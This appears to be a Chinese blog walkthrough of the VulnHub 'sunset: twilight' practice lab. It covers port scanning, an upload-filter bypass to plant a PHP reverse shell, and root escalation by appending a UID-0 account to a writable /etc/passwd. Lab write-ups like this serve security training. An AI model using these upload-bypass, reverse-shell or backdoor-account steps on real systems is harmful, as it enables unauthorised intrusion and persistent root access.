当前位置: 首页 > news >正文

sunset: twilight靶场

sunset: twilight

来自 <sunset: twilight ~ VulnHub>

1,将两台虚拟机网络连接都改为NAT模式

2,攻击机上做namp局域网扫描发现靶机

nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.128,靶场IP192.168.23.145

3,对靶机进行端口服务探测

nmap -sV -T4 -p- -A 192.168.23.145

22/tcp - SSH (OpenSSH 7.9p1 Debian 10)

  • 版本信息:OpenSSH 7.9p1,Debian 10 (Buster) 默认版本。
  • 潜在问题:弱口令/暴力破解,已知版本的远程代码执行漏洞可能较少,但可用于 爆破登录,获取用户凭证。

25/tcp - SMTP (Exim)

  • 服务器:Exim smtpd
  • 支持命令:AUTH、PIPELINING、CHUNKING,意味着支持邮件中继。
  • 潜在问题:
    • 开放中继 → 可测试是否允许未认证发件。
    • 漏洞历史:Exim 曾多次爆出 RCE 漏洞(例如 CVE-2019-15846)。

80/tcp - HTTP (Apache 2.4.38)

  • 系统:Apache 2.4.38 (Debian 10 默认版本)。
  • 返回结果:页面无标题,可能是默认站点或未配置。
  • 攻击面:
    • 目录扫描 → 寻找敏感路径(/phpmyadmin、/uploads 等)。
    • 已知漏洞 → Apache 2.4.38 存在多项 DoS / 权限提升漏洞。

139/445/tcp - SMB (Samba 4.9.5-Debian)

  • 提供 SMB 文件共享。
  • 信息泄露:
    • NetBIOS 名称:TWILIGHT
    • 工作组:WORKGROUP
    • 安全模式:消息签名未启用(危险)。
  • 攻击面:
    • 匿名共享 → 可尝试 smbclient -L 枚举。
    • Samba 4.9.x 存在漏洞(远程代码执行 CVE-2019-10197、信息泄露)。

2121/tcp - FTP (pyftpdlib 1.5.6)

  • 支持 匿名登录
  • 已发现文件:22253251-65325.twilight(可能是提示信息或关键凭证)。
  • 攻击面:
    • 匿名访问 → 枚举更多文件、尝试上传 webshell(若有写权限)。
    • pyftpdlib 默认情况下没有特别强的安全限制。

3306/tcp - MySQL (MariaDB 10.3.22)

  • 信息:
    • 认证插件:mysql_native_password
    • 已泄露 Salt:Te!p4Ooc#!x\Te}gi\o<` → 可用来做密码爆破。
  • 攻击面:
    • 弱口令爆破。
    • 若存在 Web 应用关联,可能通过数据库注入拿到权限。

8080/tcp & 63525/tcp - HTTP (PHP CLI Web Server)

  • 标识:Easy File Sharing Web Server 登录页面。
  • 攻击面:
    • 可能是弱口令/默认口令后台。
    • 该类文件共享系统常有 任意文件上传 / RCE 漏洞
    • http-open-proxy 显示可能存在代理功能 → 可被利用作跳板。

4,访问80端口开放的http服务

再扫描其子目录

dirsearch -u http://192.168.23.145 -x 403,404  

存在一个子目录,访问之

http://192.168.23.145/gallery/

允许上传文件,这里就上传kali自带的反弹shell木马

5,复制并且编辑木马反弹的IP和端口

cp /usr/share/webshells/php/php-reverse-shell.php shell.php

mousepad shell.php

这里只允许上传jpg文件,直接上传php文件会被拦截。这里就使用burpsuite,先上传shell.jpg再修改其后缀名

但是这里没有显示上传的文件再哪里,这就需要我们接续使用gobuster枚举扫描出来

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt -u http://192.168.23.145/gallery/   

http://192.168.23.145/gallery/original/

点击shell.php成功触发反弹shell,与此同时kali攻击机需要打开对4444端口的监听

成功getshell

6,python脚本获取一个可交互式脚本,再信息收集一下

python3 -c "import pty;pty.spawn('/bin/bash')"

再看看sudo提权操作是否可行

sudo命令需要密码,操作失败。但是发/etc/passwd所有用户可读可写

先在攻击机上生成一个密码 hash:
openssl passwd -1 123456

在靶机上编辑 /etc/passwd,添加一行:
echo 'hacker:$1$WIbcC9hq$kgWIRfc1/pdMOlvEXwc6K0:0:0:root:/root:/bin/bash' >> /etc/passwd

字段解释:

  • hacker → 用户名
  • :0:0: → UID=0、GID=0,即 root 权限
  • /root → home 目录
  • /bin/bash → shell

保存后你就可以直接登录:
su hacker

成功提权成为root用户,得到flag

http://www.dtcms.com/a/359570.html

相关文章:

  • 【已解决】阿里云服务器上前端访问不到后端
  • 平衡二叉树(一)
  • 【Linux基础】Linux系统启动:深入理解GRUB引导程序
  • ComfyUI-Easy-Use节点造成页面混乱问题的分析与解决方案
  • Playwright 中Codegen的优点与局限性分析
  • 烦人的Nano 编辑器,如何退出呢?
  • 八大排序--快速排序
  • C++日志系统:高效异步日志实现解析
  • 【安全学习】DVWA 靶场 SQL 注入漏洞原理分析与防御策略(教育用途)
  • Chrome++插件与GreenChrome:增强Chrome浏览器功能
  • 学习数据结构(15)插入排序+选择排序(上)
  • 一种使用 Java / Kotlin 编写检测BT种子的磁力链接是否有可用 peers 的程序
  • CAD2024安装包下载与安装详细教程
  • 生物化学Note Track(I)——氨基酸
  • PortSwigger靶场之 DOM XSS in innerHTML sink using source location.search通关秘籍
  • 从 WPF 到 Avalonia 的迁移系列实战篇4:控件模板与 TemplatedControl
  • AIA中断控制器IPI的Linux内核实现
  • 【Flask】测试平台开发,产品管理功能UI重构-第九篇
  • 应用开发使用缓存
  • R notes[2]
  • VMware虚拟机网盘下载与安装指南(附安装包)
  • GaRe:面向非约束户外照片集的可重光照 3D 高斯溅射技术简要解析
  • Python与Rust语法对比详解:从入门到精通
  • Day19_【机器学习—线性回归 (1)】
  • Linux-搭建NFS服务器
  • Hutool DsFactory多数据源切换
  • 深度学习篇---MobileNet网络结构
  • 揭秘数据分组的智慧:Self-Constrained Clustering Ensemble 介绍
  • leetcode_240 搜索二维矩阵 II
  • Windows PostgreSQL JDBC驱动安装包位置